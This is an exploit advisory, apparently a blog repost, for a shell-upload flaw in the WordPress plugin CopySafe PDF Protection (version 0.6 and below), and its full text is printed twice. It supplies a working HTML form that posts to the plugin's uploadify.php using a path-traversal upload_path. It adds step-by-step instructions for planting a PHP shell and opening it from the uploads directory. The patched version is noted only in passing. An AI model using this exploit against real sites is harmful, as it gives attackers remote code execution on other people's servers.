Wordpress Plugin CopySafe PDF Protection Shell Upload
############################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload
vulnerability
#Author : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
############################################
////////////////////////
/// Overview:
////////////////////////
Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers
from unrestricted file upload vulnerability which allow an attacker to
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there
is no check during file upload
attacker need to forward file upload request to this file with PHP
shell and file upload path
///////////////////////
/// exploit code ////
///////////////////////
<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click
submit button
shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php
############################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload
vulnerability
#Author : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
############################################
////////////////////////
/// Overview:
////////////////////////
Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers
from unrestricted file upload vulnerability which allow an attacker to
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there
is no check during file upload
attacker need to forward file upload request to this file with PHP
shell and file upload path
///////////////////////
/// exploit code ////
///////////////////////
<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>
save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click
submit button
shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php
No comments:
Post a Comment
Thanks for ur comments